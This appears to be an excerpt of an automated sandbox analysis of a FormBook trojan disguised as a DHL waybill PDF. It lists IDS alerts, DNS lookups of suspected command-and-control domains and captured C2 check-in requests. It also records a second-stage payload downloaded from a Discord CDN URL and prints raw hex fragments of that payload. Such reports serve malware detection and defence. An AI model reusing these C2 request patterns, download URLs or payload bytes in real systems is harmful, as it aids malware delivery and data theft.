                                            RT_MANIFEST | 0x62d8 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                            Imports

                                            DLL | Import
                                            mscoree.dll | _CorExeMain

                                            Version Infos

                                            Description | Data
                                            Translation | 0x0000 0x04b0
                                            LegalCopyright |
                                            Assembly Version | 0.0.0.0
                                            InternalName | 44.exe
                                            FileVersion | 0.0.0.0
                                            ProductVersion | 0.0.0.0
                                            FileDescription |
                                            OriginalFilename | 44.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            09/27/21-20:38:29.236493 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                            09/27/21-20:38:29.972482 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                            09/27/21-20:38:38.427389 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.2.3 | 178.254.0.81
                                            09/27/21-20:38:38.427389 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.2.3 | 178.254.0.81
                                            09/27/21-20:38:38.427389 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49841 | 80 | 192.168.2.3 | 178.254.0.81
                                            09/27/21-20:38:43.515732 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49842 | 80 | 192.168.2.3 | 34.102.136.180
                                            09/27/21-20:38:43.515732 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49842 | 80 | 192.168.2.3 | 34.102.136.180
                                            09/27/21-20:38:43.515732 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49842 | 80 | 192.168.2.3 | 34.102.136.180
                                            09/27/21-20:38:43.696515 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49842 | 34.102.136.180 | 192.168.2.3
                                            09/27/21-20:39:04.099948 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49867 | 23.227.38.74 | 192.168.2.3

                                            Network Port Distribution

                                            TCP Packets


                                            UDP Packets


                                            ICMP Packets

                                            Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                            Sep 27, 2021 20:38:29.236493111 CEST | 192.168.2.3 | 8.8.8.8 | cff0 | (Port unreachable) | Destination Unreachable
                                            Sep 27, 2021 20:38:29.972481966 CEST | 192.168.2.3 | 8.8.8.8 | cff0 | (Port unreachable) | Destination Unreachable

                                            DNS Queries

                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                            Sep 27, 2021 20:36:56.424174070 CEST | 192.168.2.3 | 8.8.8.8 | 0x28f6 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:19.623287916 CEST | 192.168.2.3 | 8.8.8.8 | 0x86f | Standard query (0) | www.laliinparfumeri.com | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:24.803181887 CEST | 192.168.2.3 | 8.8.8.8 | 0x95f8 | Standard query (0) | www.qq8.space | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:25.829257965 CEST | 192.168.2.3 | 8.8.8.8 | 0x95f8 | Standard query (0) | www.qq8.space | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:26.829406023 CEST | 192.168.2.3 | 8.8.8.8 | 0x95f8 | Standard query (0) | www.qq8.space | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:32.975637913 CEST | 192.168.2.3 | 8.8.8.8 | 0x6bb5 | Standard query (0) | www.bjhaitaoshop.com | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:38.362535954 CEST | 192.168.2.3 | 8.8.8.8 | 0x811e | Standard query (0) | www.lighterthanlight.net | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:43.460763931 CEST | 192.168.2.3 | 8.8.8.8 | 0xc2bb | Standard query (0) | www.dependablelawnsnow.com | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:48.737744093 CEST | 192.168.2.3 | 8.8.8.8 | 0x44f4 | Standard query (0) | www.anushreehomemadeproducts.online | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:53.875994921 CEST | 192.168.2.3 | 8.8.8.8 | 0x96bf | Standard query (0) | www.thera.xyz | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:39:03.983308077 CEST | 192.168.2.3 | 8.8.8.8 | 0x7f26 | Standard query (0) | www.themshirt.com | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:39:09.110415936 CEST | 192.168.2.3 | 8.8.8.8 | 0xa81a | Standard query (0) | www.aquitemtijolo.com | A (IP address) | IN (0x0001)

                                            DNS Answers

                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            Sep 27, 2021 20:36:56.443192959 CEST | 8.8.8.8 | 192.168.2.3 | 0x28f6 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:36:56.443192959 CEST | 8.8.8.8 | 192.168.2.3 | 0x28f6 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:36:56.443192959 CEST | 8.8.8.8 | 192.168.2.3 | 0x28f6 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:36:56.443192959 CEST | 8.8.8.8 | 192.168.2.3 | 0x28f6 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:36:56.443192959 CEST | 8.8.8.8 | 192.168.2.3 | 0x28f6 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:19.679585934 CEST | 8.8.8.8 | 192.168.2.3 | 0x86f | No error (0) | www.laliinparfumeri.com | laliinparfumeri.com | | CNAME (Canonical name) | IN (0x0001)
                                            Sep 27, 2021 20:38:19.679585934 CEST | 8.8.8.8 | 192.168.2.3 | 0x86f | No error (0) | laliinparfumeri.com | | 185.15.197.14 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:27.968054056 CEST | 8.8.8.8 | 192.168.2.3 | 0x95f8 | Server failure (2) | www.qq8.space | none | none | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:29.236413002 CEST | 8.8.8.8 | 192.168.2.3 | 0x95f8 | Server failure (2) | www.qq8.space | none | none | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:29.971919060 CEST | 8.8.8.8 | 192.168.2.3 | 0x95f8 | Server failure (2) | www.qq8.space | none | none | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:33.318994045 CEST | 8.8.8.8 | 192.168.2.3 | 0x6bb5 | Name error (3) | www.bjhaitaoshop.com | none | none | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:38.403629065 CEST | 8.8.8.8 | 192.168.2.3 | 0x811e | No error (0) | www.lighterthanlight.net | | 178.254.0.81 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:43.499557972 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2bb | No error (0) | www.dependablelawnsnow.com | dependablelawnsnow.com | | CNAME (Canonical name) | IN (0x0001)
                                            Sep 27, 2021 20:38:43.499557972 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2bb | No error (0) | dependablelawnsnow.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:48.772588968 CEST | 8.8.8.8 | 192.168.2.3 | 0x44f4 | No error (0) | www.anushreehomemadeproducts.online | | 104.21.5.62 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:48.772588968 CEST | 8.8.8.8 | 192.168.2.3 | 0x44f4 | No error (0) | www.anushreehomemadeproducts.online | | 172.67.133.9 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:38:53.930269003 CEST | 8.8.8.8 | 192.168.2.3 | 0x96bf | No error (0) | www.thera.xyz | | 52.58.78.16 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:39:04.031445026 CEST | 8.8.8.8 | 192.168.2.3 | 0x7f26 | No error (0) | www.themshirt.com | themshirt.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
                                            Sep 27, 2021 20:39:04.031445026 CEST | 8.8.8.8 | 192.168.2.3 | 0x7f26 | No error (0) | themshirt.myshopify.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
                                            Sep 27, 2021 20:39:04.031445026 CEST | 8.8.8.8 | 192.168.2.3 | 0x7f26 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
                                            Sep 27, 2021 20:39:09.156925917 CEST | 8.8.8.8 | 192.168.2.3 | 0xa81a | Name error (3) | www.aquitemtijolo.com | none | none | A (IP address) | IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • cdn.discordapp.com
                                            • www.laliinparfumeri.com
                                            • www.lighterthanlight.net
                                            • www.dependablelawnsnow.com
                                            • www.anushreehomemadeproducts.online
                                            • www.thera.xyz

                                            HTTP Packets

                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            0 | 192.168.2.3 | 49739 | 162.159.133.233 | 443 | C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
                                            Timestamp | kBytes transferred | Direction | Data


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.3 | 49740 | 162.159.133.233 | 443 | C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
                                            Timestamp | kBytes transferred | Direction | Data


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            2 | 192.168.2.3 | 49837 | 185.15.197.14 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Sep 27, 2021 20:38:19.739379883 CEST | 5746 | OUT | GET /o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1
                                            Host: www.laliinparfumeri.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 27, 2021 20:38:19.793910980 CEST | 5746 | IN | HTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Mon, 27 Sep 2021 19:26:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: close
                                            Location: https://www.laliinparfumeri.com/o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            3 | 192.168.2.3 | 49841 | 178.254.0.81 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Sep 27, 2021 20:38:38.427388906 CEST | 5772 | OUT | GET /o4um/?gBZ81XL=NmWArNFcCM0eoZWDJYXkCpdPU4u48b3a02rAkKDw3xtvPLdWME8dWY2ZX0sn8dIRZYch&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1
                                            Host: www.lighterthanlight.net
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 27, 2021 20:38:38.450105906 CEST | 5772 | IN | HTTP/1.1 404 Not Found
                                            Date: Mon, 27 Sep 2021 18:38:38 GMT
                                            Server: Apache
                                            Content-Length: 196
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            4 | 192.168.2.3 | 49842 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Sep 27, 2021 20:38:43.515732050 CEST | 5774 | OUT | GET /o4um/?gBZ81XL=uOkBJSjIW3F6CP8rQxyvI2MBRBl8nhg0UoToBCoVSjs9ZXrMBkf12YfZAaFMMZR1Rm2X&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1
                                            Host: www.dependablelawnsnow.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 27, 2021 20:38:43.696515083 CEST | 5775 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Mon, 27 Sep 2021 18:38:43 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6151bfae-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            5 | 192.168.2.3 | 49861 | 104.21.5.62 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Sep 27, 2021 20:38:48.799482107 CEST | 5821 | OUT | GET /o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1
                                            Host: www.anushreehomemadeproducts.online
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 27, 2021 20:38:48.832298994 CEST | 5823 | IN | HTTP/1.1 301 Moved Permanently
                                            Date: Mon, 27 Sep 2021 18:38:48 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Mon, 27 Sep 2021 19:38:48 GMT
                                            Location: https://www.anushreehomemadeproducts.online/o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F9dAUZlaJlVEkkBQ3Ae0WwZEG%2FYX%2F6eQhtgvbiR%2Bx%2FPGpmHJYmBrYJ8kqR8m52T47mqF%2FDRb8n0pajkL43ivrGPrOmFRspSqnnfbiiHjbInpEcG%2BC%2BRBEACeQU0XPKo50%2B2RSzhDk7TVANfp3uNtkqFsySKAFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 6956d9e30c374aa4-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            6 | 192.168.2.3 | 49865 | 52.58.78.16 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Sep 27, 2021 20:38:53.955553055 CEST | 5830 | OUT | GET /o4um/?gBZ81XL=sLOz5fxzAB+rAW0hlPtJlSBTLXwWl5RPAfNZDklBst6583qURvc+7YZqdqws0gKI3hH9&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1
                                            Host: www.thera.xyz
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 27, 2021 20:38:53.973635912 CEST | 5830 | IN | HTTP/1.1 410 Gone
                                            Server: openresty
                                            Date: Mon, 27 Sep 2021 18:38:04 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='5; url=http://www.thera.xyz/' />a </head>9 <body>35 You are being redirected to http://www.thera.xyza </body>8</html>0


                                            HTTPS Proxied Packets

                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            0 | 192.168.2.3 | 49739 | 162.159.133.233 | 443 | C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            2021-09-27 18:36:56 UTC | 0 | OUT | GET /attachments/890478905998331907/891784228721807420/bin.pdf HTTP/1.1
                                            Host: cdn.discordapp.com
                                            Connection: Keep-Alive
                                            2021-09-27 18:36:57 UTC | 0 | IN | HTTP/1.1 200 OK
                                            Date: Mon, 27 Sep 2021 18:36:57 GMT
                                            Content-Type: application/pdf
                                            Content-Length: 167424
                                            Connection: close
                                            CF-Ray: 6956d7282eae5a25-MXP
                                            Accept-Ranges: bytes
                                            Age: 3593
                                            Cache-Control: public, max-age=31536000
                                            Content-Disposition: attachment;%20filename=bin.pdf
                                            ETag: "37e9ef7b50fd39735d9fbcb16da55cba"
                                            Expires: Tue, 27 Sep 2022 18:36:57 GMT
                                            Last-Modified: Sun, 26 Sep 2021 20:32:08 GMT
                                            Vary: Accept-Encoding
                                            CF-Cache-Status: HIT
                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                            x-goog-generation: 1632688328882090
                                            x-goog-hash: crc32c=fEkWnA==
                                            x-goog-hash: md5=N+nve1D9OXNdn7yxbaVcug==
                                            x-goog-metageneration: 1
                                            x-goog-storage-class: STANDARD
                                            x-goog-stored-content-encoding: identity
                                            x-goog-stored-content-length: 167424
                                            X-GUploader-UploadID: ADPycdsIppADOuLImTpDbISxveaxTaCa-NtoD6SZFT7ocO9U582XFiIUZOmPVWKpMAs4bqxa850_EeTyVI9GMClWVgh0er5a0w
                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                            Data Ascii: []7uEjPF_^[]8uMjQ'_^[]6uURJ_^[]1t2t4t9uV3t<8XLNGuE@;r4uEMPWQ_^[]uu9t_F^[]1uUVWR_^[]2u*EWPbMVWQ
                                            2021-09-27 18:36:57 UTC17INData Raw: e8 cd 5e 00 00 83 c4 28 6a 01 8d 85 70 f5 ff ff 6a 0f 50 e8 ea 63 01 00 83 c4 04 8d 8c 45 70 f5 ff ff 51 56 e8 a9 5e 00 00 8d 55 b4 52 e8 d0 63 01 00 83 c4 14 03 c0 50 8d 45 b4 50 8d 8d 70 f5 ff ff 51 e8 ba 63 01 00 8d 94 45 52 f5 ff ff 83 c4 04 52 e8 ba 60 01 00 8d 8d f8 fe ff ff 8b d1 b8 40 00 00 00 52 66 89 45 9e 89 4d a0 e8 90 63 01 00 03 c0 66 89 45 9c 68 19 02 02 00 8d 85 70 f5 ff ff 50 8d 4d 98 51 56 e8 b4 73 00 00 83 c4 20 85 c0 74 68 8d 55 ec 52 8b 55 98 68 00 01 00 00 8d 85 70 fb ff ff 50 6a 01 8d 4d 9c 51 52 56 e8 2d 43 01 00 83 c4 1c 85 c0 75 41 8b 85 78 fb ff ff 8d 8c 05 70 fb ff ff 51 53 e8 12 63 01 00 8d 94 38 a4 84 00 00 83 c4 04 52 e8 d2 66 01 00 8b 85 78 fb ff ff 8d 8c 05 70 fb ff ff 51 8d 95 78 fd ff ff 52 e8 b8 66 01 00 83 c4 10 8d 85
                                            Data Ascii: ^(jpjPcEpQV^URcPEPpQcERR`@RfEMcfEhpPMQVs thURUhpPjMQRV-CuAxpQSc8RfxpQxRf
                                            2021-09-27 18:36:57 UTC18INData Raw: 0c 83 c4 08 68 01 00 04 80 50 ff d6 5f 33 c0 5e 8b e5 5d c3 20 6e 25 09 70 55 8b ec 81 ec 60 04 00 00 53 57 8b 7d 0c 33 db 3b fb 0f 84 b8 00 00 00 66 39 1f 0f 84 af 00 00 00 56 6a 3f 8d 45 a1 53 50 88 5d a0 e8 ef 5b 01 00 8d 4d a0 6a 07 51 e8 c4 67 01 00 8b 75 08 8d 55 a0 52 83 c6 1c 56 e8 c4 55 00 00 68 6f 42 e9 df 53 53 50 56 e8 c6 f8 00 00 8b f0 83 c4 30 3b f3 74 6c 68 fe 03 00 00 8d 8d a2 fb ff ff 33 c0 53 51 66 89 85 a0 fb ff ff e8 a2 5b 01 00 57 e8 0c 5e 01 00 03 c0 83 c4 10 3d fc 03 00 00 77 3f 50 8d 95 a0 fb ff ff 57 52 e8 02 5b 01 00 83 c4 0c 8d 55 e0 8d 85 a0 fb ff ff b9 14 04 00 00 52 89 5d e0 c7 45 e4 03 00 00 00 89 45 e8 89 5d ec 66 89 4d f0 89 5d f2 89 5d f6 89 5d fa ff d6 5e 5f 5b 8b e5 5d c3 75 68 7c a8 60 32 b9 5b 3f e7 55 8b ec 83 ec 28
                                            Data Ascii: hP_3^] n%pU`SW}3;f9Vj?ESP][MjQguURVUhoBSSPV0;tlh3SQf[W^=w?PWR[UR]EE]fM]]]^_[]uh|`2[?U(
                                            2021-09-27 18:36:57 UTC20INData Raw: c7 80 a8 a9 00 00 01 00 00 00 c7 80 14 20 00 00 02 00 00 00 6a 04 8d 85 98 fe ff ff 50 56 e8 fd 53 00 00 6a 00 8d 4d fc 51 8d 95 98 fe ff ff 52 e8 8b 5a 01 00 6a 08 6a 05 e8 f2 47 00 00 0f b6 c0 83 c4 30 50 8d 8d 98 fe ff ff 51 e8 ff 58 01 00 8d 94 45 98 fe ff ff 83 c4 04 52 e8 af 65 01 00 6a 00 8d 45 f0 50 8d 8d 98 fe ff ff 51 e8 4d 5a 01 00 6a 00 6a 01 8d be 2c 0a 00 00 57 56 e8 5c ef 00 00 6a 00 6a 15 57 56 8b d8 e8 4f ef 00 00 56 8b f8 e8 a7 f8 ff ff 83 c4 38 85 c0 75 1a 85 db 74 0a 53 56 e8 95 55 01 00 83 c4 08 5f 5e b8 04 00 00 00 5b 8b e5 5d c3 8b 55 0c 8b 45 10 6a 00 6a 1b 8d 8d 98 fe ff ff 51 56 89 96 2c 0b 00 00 89 86 30 0b 00 00 e8 03 ef 00 00 83 c4 10 85 c0 74 4b 6a 40 8d 55 9c 6a 00 52 e8 ef 55 01 00 33 c0 50 8d 4d e0 51 8d 55 98 52 50 50 68
                                            Data Ascii: jPVSjMQRZjjG0PQXERejEPQMZjj,WV\jjWVOV8utSVU_^[]UEjjQV,0tKj@UjRU3PMQURPPh
                                            2021-09-27 18:36:57 UTC21INData Raw: c4 3c 80 38 31 75 68 c6 00 00 b9 01 00 00 00 80 38 2e 74 47 41 48 83 f9 0e 72 f4 56 6a 08 8d 45 bc 50 8d 8d 7c ff ff ff 51 e8 e9 53 01 00 83 c4 0c 89 45 fc 85 c0 74 78 b8 01 00 00 00 8d 74 1f ff 8d 9b 00 00 00 00 8a 0e 84 c9 74 41 80 f9 3a 74 3c 40 4e 83 f8 40 72 ee eb 55 2b f9 8d 04 1f 50 8d 4d bc 51 e8 8d 57 01 00 83 c4 08 eb ac 8d 95 70 ff ff ff 53 52 e8 bb 4d 01 00 83 c4 08 85 c0 75 98 5f b8 04 00 00 00 5b 8b e5 5d c3 8d 48 ff 8b f7 2b f9 51 03 fb 8d 95 b0 fd ff ff 2b f0 57 52 c6 04 1e 00 e8 5c 50 01 00 83 c4 0c 8b fe 8b 75 08 6a 00 6a 04 8d 85 30 fe ff ff 50 56 e8 03 4e 00 00 8d 8d 30 fe ff ff 51 e8 27 53 01 00 6a 00 8d 55 0c 52 8d 85 30 fe ff ff 50 e8 85 54 01 00 6a 08 6a 05 e8 ec 41 00 00 0f b6 c8 83 c4 28 51 8d 95 30 fe ff ff 52 e8 f9 52 01 00 8d
                                            Data Ascii: <81uh8.tGAHrVjEP|QSEtxttA:t<@N@rU+PMQWpSRMu_[]H+Q+WR\Pujj0PVN0Q'SjUR0PTjjA(Q0RR
                                            2021-09-27 18:36:57 UTC22INData Raw: 51 56 e8 07 f0 ff ff 56 e8 c1 f1 ff ff 83 c4 24 33 c0 5e 8b e5 5d c3 82 36 d1 8c aa 8f 94 55 8b ec 57 8b 7d 08 8b 87 d8 07 00 00 85 c0 74 76 56 8d b0 00 20 00 00 8b 87 6c 0b 00 00 8d 48 01 89 8f 6c 0b 00 00 83 f8 10 76 2d 83 7e 50 00 74 27 56 57 e8 d7 07 00 00 83 c4 08 83 be a8 89 00 00 00 74 14 56 57 c7 86 a8 89 00 00 00 00 00 00 e8 da 02 00 00 83 c4 08 83 3e 00 74 28 83 7e 04 00 74 22 83 7e 10 00 75 1c 57 c7 46 04 00 00 00 00 e8 a9 16 00 00 57 e8 f3 6c 00 00 57 e8 dd ec ff ff 83 c4 0c 5e 5f 5d c3 17 c9 2e fe 43 49 55 8b ec 53 56 8b 75 08 8b 86 a0 0b 00 00 68 e1 ea 88 06 33 db 53 53 50 8d 8e 94 0c 00 00 51 e8 5c e8 00 00 83 c4 14 89 45 08 3b c3 74 7d 8b ff 68 88 13 00 00 ff 55 08 8b 86 d8 07 00 00 3b c3 74 ee 8d b8 00 20 00 00 8b 86 6c 0b 00 00 8d 50 01
                                            Data Ascii: QVV$3^]6UW}tvV lHlv-~Pt'VWtVW>t(~t"~uWFWlW^_].CIUSVuh3SSPQ\E;t}hU;t lP
                                            2021-09-27 18:36:57 UTC24INData Raw: fd ff ff 51 66 89 85 ec fd ff ff e8 c5 46 01 00 8d 9f ac 89 00 00 53 e8 29 49 01 00 03 c0 50 8d 95 ec fd ff ff 53 52 e8 29 46 01 00 8d 85 ec fd ff ff 50 e8 0d 49 01 00 b9 5c 00 00 00 8d 9f ec 8c 00 00 53 66 89 8c 45 ec fd ff ff e8 f4 48 01 00 83 c4 24 03 c0 50 8d 95 ec fd ff ff 53 52 e8 e1 48 01 00 8d 84 45 ec fd ff ff 83 c4 04 50 e8 e1 45 01 00 8d 8d ec fd ff ff 51 e8 c5 48 01 00 83 c4 10 6a 00 8d 95 ec fd ff ff 89 45 f4 8b 86 04 0d 00 00 52 ff d0 8d 8d ec fd ff ff 51 e8 a2 48 01 00 ba 5c 00 00 00 8d 9f ac 8a 00 00 53 66 89 94 45 ec fd ff ff e8 89 48 01 00 83 c4 08 03 c0 50 8d 85 ec fd ff ff 53 50 e8 76 48 01 00 8d 8c 45 ec fd ff ff 83 c4 04 51 e8 76 45 01 00 6a 00 6a 1a 8d 95 ec fd ff ff 52 56 e8 e5 de 00 00 83 c4 1c 85 c0 0f 84 ba 01 00 00 8b 4d f4 33
                                            Data Ascii: QfFS)IPSR)FPI\SfEH$PSRHEPEQHjERQH\SfEHPSPvHEQvEjjRVM3
                                            2021-09-27 18:36:57 UTC25INData Raw: 53 8d 4d bc 51 8d 95 60 ff ff ff 52 53 53 53 53 53 53 53 8d 8d 60 fd ff ff 51 53 ff d0 5e 5b 8b e5 5d c3 5e 33 c0 5b 8b e5 5d c3 cc 55 8b ec 8b 4d 08 8b 51 14 85 d2 74 1f 8b 41 18 83 f8 10 72 17 3d 00 14 00 00 73 10 6a 00 50 8b 41 04 52 50 e8 37 f7 00 00 83 c4 10 5d c3 cc cc 55 8b ec 8b 45 08 8b 48 18 53 56 8b 70 04 8b 5e 40 57 8b 78 1c 8b d1 85 db 74 0e 83 be 64 15 00 00 00 75 0e 8b 50 14 8b f9 83 be 64 15 00 00 00 74 0a 85 db 75 06 8b 50 1c 8b 78 20 85 d2 74 17 8d 47 f0 3d ef 13 00 00 77 0d 6a 00 57 52 56 e8 dc f6 00 00 83 c4 10 5f 5e 5b 5d c3 f5 c2 34 41 55 8b ec 57 8b 7d 08 8b 47 04 83 b8 ac 0c 00 00 05 75 0c 50 e8 f7 e1 ff ff 83 c4 04 5f 5d c3 83 b8 68 15 00 00 00 74 0c 57 e8 f2 08 01 00 83 c4 04 5f 5d c3 56 33 f6 39 77 1c 76 44 8d 64 24 00 8b 47 18
                                            Data Ascii: SMQ`RSSSSSSS`QS^[]^3[]UMQtAr=sjPARP7]UEHSVp^@WxtduPdtuPx tG=wjWRV_^[]4AUW}GuP_]htW_]V39wvDd$G
